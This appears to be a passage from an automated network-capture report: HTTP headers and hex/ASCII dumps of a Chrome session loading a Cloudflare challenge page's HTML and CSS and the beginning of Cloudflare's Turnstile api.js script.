                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                cross-origin-embedder-policy: require-corp
                                                                cross-origin-opener-policy: same-origin
                                                                cross-origin-resource-policy: cross-origin
                                                                origin-agent-cluster: ?1
                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                referrer-policy: same-origin
                                                                document-policy: js-profiling
                                                                2025-01-10 21:29:03 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 66 63 32 61 32 65 39 34 64 30 66 36 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                Data Ascii: Server: cloudflareCF-RAY: 8fffc2a2e94d0f6c-EWRalt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:03 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.849731104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:03 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:03 UTC471INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:03 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 47521
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2a2ebe243f2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:03 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                2025-01-10 21:29:03 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
